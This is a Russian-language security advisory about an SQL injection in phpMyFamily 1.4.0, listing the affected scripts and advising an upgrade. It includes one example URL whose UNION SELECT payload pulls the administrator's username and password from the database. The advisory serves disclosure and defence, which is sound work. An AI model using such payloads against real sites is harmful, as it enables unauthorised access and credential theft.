SQL-инъекция в phpMyFamily

Дата публикации:
22.03.2005
Дата изменения:
24.03.2009
Всего просмотров:
881
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpmyfamily 1.x
Уязвимые версии: phpMyFamily 1.4.0

Описание:
Уязвимость позволяет удаленному пользователю произвести SQL-инъекцию и получить доступ к базе данных приложения.

Уязвимость обнаружена в сценариях people.php, track.php, edit.php, document.php, census.php из-за отсутствия фильтрации входных данных. Удаленный пользователь может получить неавторизованный административный доступ к приложению, выполнить произвольные SQL команды. Пример:

http://[host]/[path]/people.php?person=00002'
%20UNION%20SELECT%20NULL,password,
NULL,username,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1/*

URL производителя: http://www.phpmyfamily.net

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: SQL Injection Vulnerability in phpMyFamily

или введите имя

CAPTCHA